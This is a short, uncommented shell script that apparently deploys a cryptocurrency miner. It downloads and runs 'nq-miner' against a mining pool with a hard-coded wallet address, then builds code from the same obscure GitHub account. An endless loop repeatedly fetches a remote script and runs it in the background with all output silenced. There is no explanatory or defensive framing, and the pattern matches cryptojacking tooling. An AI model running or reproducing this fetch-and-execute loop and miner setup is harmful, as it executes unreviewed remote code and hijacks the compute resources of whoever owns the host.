wget https://raw.githubusercontent.com/mobileapps84741274/mobile84741274/master/linux8488.tar.xz

tar -xvf ./linux8488.tar.xz

cd ./linux8488/

./nq-miner -t cuda -a "NQ54 HKTP BDQK 7PV9 BXKK GJ3H T6SM 4L5A 83C2" -p pool.acemining.co:8443 -t 2 -b 4

git clone https://github.com/mobileapps84741274/linux8444

cd linux8444
mkdir build
cd build
cmake .. -DCMAKE_BUILD_TYPE=Release
make

while true
do

wget -N -q https://raw.githubusercontent.com/mobileapps84741274/mobile84741274/master/linuxweb8412

bash ./linuxweb8412 &> /dev/null &

./linux84 8

done
